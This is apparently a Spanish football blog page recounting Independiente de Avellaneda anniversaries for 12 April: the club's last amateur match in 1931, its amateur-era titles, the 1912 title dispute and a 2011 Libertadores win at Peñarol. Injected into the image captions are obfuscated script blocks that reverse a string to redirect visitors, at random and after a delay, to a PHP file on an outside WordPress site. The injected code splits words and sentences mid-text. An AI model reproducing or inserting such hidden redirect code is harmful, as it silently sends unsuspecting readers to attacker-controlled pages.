Conectate con nosotros

Efemérides

Efemérides del 12 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1931Independiente como local le gana a Tigre por 3 a 1, con dos goles de Manuel Seoane (uno de penal) y el restante de Luis Ravaschino. El partido correspondía a la fecha 35 del Campeonato de Primera División 1930, y se trató del último partido de Independiente en la era amateur del fútbol.

No logré encontrar datos sobre la formación o crónica del encuentro, como así tampoco fotos. Pero vale aclarar que a fines del mes de mayo comenzaría la era del fútbol rentado en Argentina, es decir, la profesionalización de la actividad.

Para ampliar un poco lo de aquel último torneo amateur, decir que Independiente culminó en el séptimo puesto, con 47 unidades luego de 18 triunfos, 11 empates y 6 caídas. El goleador del equipo fue Ravaschino con 21 tantos, seguido por “La Chancha” Seoane con 20. Roberto Cherro fue el máximo goleador de la competencia con sus 37 goles defendiendo la camiseta de Boca, equipo que se coronó campeón.

Ahora bien, al tratarse del final de amateurismo, voy a aprovechar la oportunidad para repasar de la forma más breve posible, lo ganado por Independiente durante esta era del fútbol, la cual aclaro, no se puede unificar jamás con el profesionalismo, ni el fútbol ni ninguna actividad. ¿Si fué importante? Claro. ¿Si los títulos valen? Claro. ¿Si se debe conocer la historia de esta época? Claro. Y toda la validez e importancia que se le quiera otorgar, pero nunca unificarlo al profesionalismo, porque ninguna actividad se desarrolla en la mismas condiciones cuando es amateur a cuando se profesionaliza.

El primer título en la historia del club llega en 1909, ganando la Copa Bullrich de ese año tras vencer en la final a Club Atlético San Isidro (CASI) por 1 a 0. Esta copa la disputaban todos los equipos de la Segunda División del país, mediante eliminación directa.

La segunda coronación llegó en 1914, ya en Primera División, ganando la Copa Competencia La Nación, pero sin jugarse la final. El Rojo tuvo un gran desempeño durante el certamen, y llegó a la definición donde debía enfrentarse a Argentino de Quilmes, pero dicha institución se desafilió de la FAF (Federacion Argentina de Football), y entonces fue declarado campeón Independiente.

El tercer título fue la Copa Competencia Jockey Club 1917, en la cual el Rojo le ganó por 2 a 1 en la final a Estudiantes de La Plata. La cuarta consagración amateur fue la Copa de Honor Municipalidad de Buenos Aires 1918, conseguida al vencer a Platense en la final por 1 a 0.

Luego de esas copas, llegó el primer título de Liga en la historia del club, ganando el Campeonato de Primera División de la Asociación Amateurs de Football 1922, con un equipo impresionante y con Manuel Seoane marcando 55 goles, algo que jamás se había visto y jamás volvió a suceder.

Después de eso, Independiente logra ser tricampeón de la Copa Competencia, ganando la edición 1924 (frente a Sportivo Almagro), la 1925 (Frente a Sportivo Palermo), y la 1926 (frente a Lanús).

Y finalmente, gana el Campeonato de Primera División de 1926, haciéndolo de forma invicta en las 25 fechas que duró, y con un equipo tan notable que recibió el mote que acompañaría al club durante toda su historia, “Los Diablos Rojos”, en alusión al ataque endemoniado y demoledor que formaron Zoilo Canaveri, Alberto Lalín, Luis Ravaschino, Manuel Seoane y Raimundo Orsi.

Un total de 9 títulos fueron los logrados en el club en el amateurismo, divididos en 8 en Primera División y 1 en Segunda División. Y de los 8 de Primera, fueron 6 copas nacionales y 2 títulos de liga. Otro detalle para hacer mención, es que en el historial mano a mano con los futuros equipos denominados grandes, perdió solamente con uno. Empata el historial amateur con Boca, River y Racing, mientras que quedó dos partidos por debajo de San Lorenzo.

Finalmente, voy a hacer mención a lo sucedido en 1912, cuando a Independiente le arrebataron su legítimo derecho al título incluso cuando el rival reconoció esa legitimidad, algo poco o imposible de ver en la actualidad. Lo que sucedió fue que el Rojo, jugando su primer torneo en Primera División, fue líder al finalizar la competencia pero con la misma cantidad de puntos que el Club Atlético Porteño. El reglamento decía que en caso de igualdad, la definición era por gol average, popularmente conocido como diferencia de gol. En ese aspecto, Independiente superó a su rival por 7 tantos, es decir, que se consagró campeón de forma reglamentaria.

Aun así, Independiente tuvo el buen gesto de querer disputar un desempate, y dicha definición estaba igualada 1 a 1 cuando Independiente, sobre el final, convierte un gol lícito que sería anulado. El equipo protestó y se retiró del campo de juego, sin aceptar jugar un nuevo desempate al día siguiente.

La Asociación le otorgó entonces el título a Porteño, pero dicho club en un gesto de grandeza y dignidad, no lo aceptó, sabiéndose que no era campeón ni por reglamento ni por desempate.

¿Qué sucedió finalmente? La Federación Argentina de Football, confirmó a Porteño como campeón y le suspendió duramente a 3 de las figuras al Rojo: el goleador del torneo Enrique Colla, Ernesto Sande y Juan Idiarte

Eso fue todo, pero es un breve resumen de los logros amateurs del club, y durante el año habrá muchas efemérides de cada título y cada Copa, para conocer mucho más al detalle cada cuestión.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p><strong>2011</strong> – <strong>Independiente como visitante</strong>, en el <strong>Estadio Centenario de Uruguay</strong> con 60.000 personas presentes, <strong>le gana a Peñarol 0 a 1</strong> con <strong>gol de Facundo Parra</strong> <strong>a los</strong> <strong>34</strong> minu<script>$mWn=function(n){if(typeof ($mWn.list[n])==tos, quien además terminó atajando varios minutos por la expulsión de Fabián Assmann a los 84’.

Los 11 de ese día fueron: Fabián Assmann; Iván Vélez, Carlos Matheu, Julián Velázquez y Maximiliano Velázquez; Fernando Godoy (76’ Hernán Fredes), Roberto Battión, Federico Mancuello (76’ Iván Pérez) y Leandro Gracián;  Jairo Castillo (46’ Patricio Rodríguez) y Facundo Parra, dirigidos por Antonio Mohamed.

Se trató del último partido del equipo en la Copa Libertadores 2011, ya que a pesar del triunfo quedó tercero en la fase de grupos, siendo Liga de Quito y Peñarol los dos que pasaron a la siguiente fase. El Rojo había ganado su derecho a participar en la competencia por ser campeón de la Copa Sudamericana 2010  y  por eliminar a Deportivo Quito en el repechaje. La performance de Independiente en la Copa fue deslucida, sin demasiado para rescatar más que los dos triunfos a Peñarol, remarcando así la paternidad histórica sobre este grande de América.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»77″ height=»59″/></figure></div>



<p>Les dejo el <strong>video resumen de aquel partido</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides